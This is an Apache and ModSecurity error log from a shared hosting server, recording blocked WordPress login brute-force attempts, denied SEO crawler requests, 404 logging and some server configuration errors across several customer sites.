[Tue May 26 19:03:31.509701 2026] [security2:error] [pid 1045635:tid 1045739] [remote 167.114.139.24:29546] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "taotechservices.com"] [uri "/robots.txt"] [unique_id "ahWhKxhDcQXYr7SS5sUl0QAAKGc"]
[Tue May 26 19:03:31.509889 2026] [security2:error] [pid 1045635:tid 1045805] [client 167.114.139.24:29546] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "taotechservices.com"] [uri "/robots.txt"] [unique_id "ahWhKxhDcQXYr7SS5sUl0QAAKGc"]
[Tue May 26 19:03:32.148896 2026] [security2:error] [pid 1045635:tid 1045728] [remote 84.247.129.9:60006] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 9.129.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWhLBhDcQXYr7SS5sUl4gAAO1w"]
[Tue May 26 19:03:32.265557 2026] [security2:error] [pid 1045635:tid 1045772] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhKxhDcQXYr7SS5sUl3gAAAAc"]
[Tue May 26 19:03:32.847851 2026] [security2:error] [pid 1045635:tid 1045729] [remote 84.247.129.9:60006] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 9.129.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWhLBhDcQXYr7SS5sUl9gAAR10"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:03:32.993935 2026] [security2:error] [pid 1045635:tid 1045721] [remote 142.44.233.77:39228] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "taotechservices.com"] [uri "/"] [unique_id "ahWhLBhDcQXYr7SS5sUl-wAAI1U"]
[Tue May 26 19:03:32.994184 2026] [security2:error] [pid 1045635:tid 1045800] [client 142.44.233.77:39228] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "taotechservices.com"] [uri "/"] [unique_id "ahWhLBhDcQXYr7SS5sUl-wAAI1U"]
[Tue May 26 19:03:33.819760 2026] [security2:error] [pid 1045635:tid 1045797] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhLRhDcQXYr7SS5sUmBwAAACA"]
[Tue May 26 19:03:36.061827 2026] [security2:error] [pid 1045635:tid 1045857] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhLxhDcQXYr7SS5sUmPwAAAFw"]
[Tue May 26 19:03:36.367538 2026] [core:crit] [pid 1045635:tid 1045815] (13)Permission denied: [client 157.55.39.192:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 19:03:37.667811 2026] [security2:error] [pid 1045635:tid 1045813] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhMRhDcQXYr7SS5sUmegAAADA"]
[Tue May 26 19:03:38.416684 2026] [security2:error] [pid 1045635:tid 1045763] [remote 194.163.139.224:44774] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 224.139.163.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahWhMhhDcQXYr7SS5sUmpgAAfH8"]
[Tue May 26 19:03:39.328757 2026] [security2:error] [pid 1045635:tid 1045645] [remote 194.163.139.224:44774] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 224.139.163.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahWhMxhDcQXYr7SS5sUmyQAAOAk"], referer: https://yndglobal.com/wp-login.php
[Tue May 26 19:03:39.786221 2026] [security2:error] [pid 1045635:tid 1045854] [client 102.164.188.174:9899] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "erp.azurmediatec.com"] [uri "/salaries/card.php"] [unique_id "ahWhMhhDcQXYr7SS5sUmtAAAWQM"], referer: https://erp.azurmediatec.com/salaries/card.php?action=create
[Tue May 26 19:03:39.971155 2026] [security2:error] [pid 1045635:tid 1045872] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhMxhDcQXYr7SS5sUmzQAAAGs"]
[Tue May 26 19:03:42.623275 2026] [security2:error] [pid 1045635:tid 1045889] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhNhhDcQXYr7SS5sUnFgAAAHw"]
[Tue May 26 19:03:44.789619 2026] [security2:error] [pid 1045635:tid 1045878] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhOBhDcQXYr7SS5sUnVAAAAHE"]
[Tue May 26 19:03:45.203190 2026] [security2:error] [pid 1045635:tid 1045668] [remote 162.214.206.32:50116] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 32.206.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahWhORhDcQXYr7SS5sUnbQAAYCA"]
[Tue May 26 19:03:45.618684 2026] [security2:error] [pid 1045635:tid 1045662] [remote 162.214.206.32:50116] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 32.206.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahWhORhDcQXYr7SS5sUngwAATBo"], referer: https://thedebateafrica.org/wp-login.php
[Tue May 26 19:03:47.215301 2026] [security2:error] [pid 1045635:tid 1045807] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhOhhDcQXYr7SS5sUnqgAAACo"]
[Tue May 26 19:03:49.188435 2026] [security2:error] [pid 1045635:tid 1045807] [client 202.76.175.177:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhPBhDcQXYr7SS5sUn6QAAACo"]
[Tue May 26 19:03:49.206836 2026] [security2:error] [pid 1045635:tid 1045878] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhPBhDcQXYr7SS5sUn6AAAAHE"]
[Tue May 26 19:03:51.336360 2026] [security2:error] [pid 1045635:tid 1045702] [remote 13.201.108.33:42678] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.108.201.13.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWhPxhDcQXYr7SS5sUoLQAAJUI"]
[Tue May 26 19:03:51.367530 2026] [core:error] [pid 1045635:tid 1045866] [client 168.144.85.221:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 19:03:51.367547 2026] [core:error] [pid 1045635:tid 1045866] [client 168.144.85.221:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 19:03:51.390607 2026] [security2:error] [pid 1045635:tid 1045859] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhPhhDcQXYr7SS5sUoLAAAAF4"]
[Tue May 26 19:03:51.793965 2026] [security2:error] [pid 1045635:tid 1045704] [remote 13.201.108.33:42678] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.108.201.13.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWhPxhDcQXYr7SS5sUoNQAAM0Q"], referer: https://obinnawrites.com/wp-login.php
[Tue May 26 19:03:53.181805 2026] [security2:error] [pid 1045635:tid 1045891] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhQBhDcQXYr7SS5sUoVgAAAH4"]
[Tue May 26 19:03:53.325137 2026] [security2:error] [pid 1045635:tid 1045718] [remote 51.195.183.44:36344] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "keydussecurity.com"] [uri "/robots.txt"] [unique_id "ahWhQRhDcQXYr7SS5sUocAAAXVI"]
[Tue May 26 19:03:53.325287 2026] [security2:error] [pid 1045635:tid 1045858] [client 51.195.183.44:36344] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "keydussecurity.com"] [uri "/robots.txt"] [unique_id "ahWhQRhDcQXYr7SS5sUocAAAXVI"]
[Tue May 26 19:03:53.941061 2026] [autoindex:error] [pid 1045635:tid 1045830] [client 178.20.45.159:52129] AH01276: Cannot serve directory /home1/newde164/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://newdental.com.co/
[Tue May 26 19:03:54.754173 2026] [autoindex:error] [pid 1045635:tid 1045781] [client 178.20.45.159:53243] AH01276: Cannot serve directory /home1/newde164/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://newdental.com.co/
[Tue May 26 19:03:54.780213 2026] [security2:error] [pid 1045635:tid 1045689] [remote 54.39.6.19:15258] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "keydussecurity.com"] [uri "/"] [unique_id "ahWhQhhDcQXYr7SS5sUolgAAfzU"]
[Tue May 26 19:03:54.780400 2026] [security2:error] [pid 1045635:tid 1045892] [client 54.39.6.19:15258] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "keydussecurity.com"] [uri "/"] [unique_id "ahWhQhhDcQXYr7SS5sUolgAAfzU"]
[Tue May 26 19:03:55.333989 2026] [security2:error] [pid 1045635:tid 1045872] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhQhhDcQXYr7SS5sUoogAAAGs"]
[Tue May 26 19:03:57.402878 2026] [core:error] [pid 1045635:tid 1045801] [client 168.144.85.221:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://webdisk.obinnawrites.com/
[Tue May 26 19:03:57.402905 2026] [core:error] [pid 1045635:tid 1045801] [client 168.144.85.221:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://webdisk.obinnawrites.com/
[Tue May 26 19:03:58.190510 2026] [security2:error] [pid 1045635:tid 1045841] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhRRhDcQXYr7SS5sUo7AAAAEw"]
[Tue May 26 19:03:59.706424 2026] [security2:error] [pid 1045635:tid 1045801] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhRxhDcQXYr7SS5sUpEQAAACQ"]
[Tue May 26 19:04:02.396222 2026] [security2:error] [pid 1045635:tid 1045874] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhSRhDcQXYr7SS5sUpVAAAAG0"]
[Tue May 26 19:04:03.085309 2026] [security2:error] [pid 1045635:tid 1045738] [remote 51.91.98.45:37458] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWhShhDcQXYr7SS5sUpeAAANmY"]
[Tue May 26 19:04:04.799882 2026] [security2:error] [pid 1045635:tid 1045809] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhTBhDcQXYr7SS5sUpowAAACw"]
[Tue May 26 19:04:06.312466 2026] [security2:error] [pid 1045635:tid 1045637] [remote 121.200.216.55:38078] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWhThhDcQXYr7SS5sUp0AAANwE"]
[Tue May 26 19:04:06.778331 2026] [security2:error] [pid 1045635:tid 1045800] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhThhDcQXYr7SS5sUp2gAAACM"]
[Tue May 26 19:04:07.230765 2026] [security2:error] [pid 1045635:tid 1045857] [client 175.6.54.250:56298] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "207.174.214.47"] [uri "/"] [unique_id "ahWhTxhDcQXYr7SS5sUp8QAAAFw"]
[Tue May 26 19:04:07.420470 2026] [security2:error] [pid 1045635:tid 1045753] [remote 72.167.150.128:59932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.150.167.72.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWhTxhDcQXYr7SS5sUp8wAAQXU"]
[Tue May 26 19:04:07.675764 2026] [security2:error] [pid 1045635:tid 1045641] [remote 72.167.150.128:59932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.150.167.72.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWhTxhDcQXYr7SS5sUqBgAACwU"], referer: https://obinnawrites.com/wp-login.php
[Tue May 26 19:04:08.241884 2026] [security2:error] [pid 1045635:tid 1045760] [remote 194.213.4.139:41110] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.4.213.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclubmembership.com"] [uri "/wp-login.php"] [unique_id "ahWhUBhDcQXYr7SS5sUqFgAALHw"]
[Tue May 26 19:04:08.619859 2026] [security2:error] [pid 1045635:tid 1045880] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhUBhDcQXYr7SS5sUqGQAAAHM"]
[Tue May 26 19:04:08.623022 2026] [security2:error] [pid 1045635:tid 1045756] [remote 194.213.4.139:41110] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.4.213.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclubmembership.com"] [uri "/wp-login.php"] [unique_id "ahWhUBhDcQXYr7SS5sUqKAAAP3g"], referer: https://kingsclubmembership.com/wp-login.php
[Tue May 26 19:04:09.570786 2026] [security2:error] [pid 1045635:tid 1045814] [client 47.128.21.123:41062] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.wrapmachines.com"] [uri "/robots.txt"] [unique_id "ahWhURhDcQXYr7SS5sUqPgAAADE"]
[Tue May 26 19:04:11.200063 2026] [security2:error] [pid 1045635:tid 1045825] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhUhhDcQXYr7SS5sUqVwAAADw"]
[Tue May 26 19:04:13.453403 2026] [security2:error] [pid 1045635:tid 1045785] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhVRhDcQXYr7SS5sUqmwAAABQ"]
[Tue May 26 19:04:13.707376 2026] [security2:error] [pid 1045635:tid 1045794] [client 147.135.213.153:59114] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cicodev.org"] [uri "/robots.txt"] [unique_id "ahWhVRhDcQXYr7SS5sUqsQAAAB0"]
[Tue May 26 19:04:13.707581 2026] [security2:error] [pid 1045635:tid 1045794] [client 147.135.213.153:59114] ModSecurity: Warning. Matched phrase "MJ12bot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "cicodev.org"] [uri "/robots.txt"] [unique_id "ahWhVRhDcQXYr7SS5sUqsQAAAB0"]
[Tue May 26 19:04:15.090348 2026] [security2:error] [pid 1045635:tid 1045674] [remote 222.165.190.235:43008] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWhVhhDcQXYr7SS5sUqzgAAYiY"]
[Tue May 26 19:04:15.291022 2026] [security2:error] [pid 1045635:tid 1045672] [remote 208.109.188.137:47530] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.188.109.208.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWhVxhDcQXYr7SS5sUq1QAABSQ"]
[Tue May 26 19:04:15.547514 2026] [security2:error] [pid 1045635:tid 1045661] [remote 222.165.190.235:43008] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWhVxhDcQXYr7SS5sUq5wAAdhk"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:04:15.587349 2026] [security2:error] [pid 1045635:tid 1045667] [remote 162.240.102.228:49848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.102.240.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWhVxhDcQXYr7SS5sUq3QAANh8"]
[Tue May 26 19:04:15.884652 2026] [security2:error] [pid 1045635:tid 1045867] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhVxhDcQXYr7SS5sUq5QAAAGY"]
[Tue May 26 19:04:15.897843 2026] [security2:error] [pid 1045635:tid 1045861] [client 104.136.66.252:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhVxhDcQXYr7SS5sUq4AAAAGA"]
[Tue May 26 19:04:16.481675 2026] [autoindex:error] [pid 1045635:tid 1045837] [client 77.90.185.5:56847] AH01276: Cannot serve directory /home2/ushapjsg/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://ushaprec.com/
[Tue May 26 19:04:16.657936 2026] [security2:error] [pid 1045635:tid 1045685] [remote 208.109.188.137:47530] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.188.109.208.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWhWBhDcQXYr7SS5sUrBwAAbzE"], referer: https://bloggertarget.com/wp-login.php
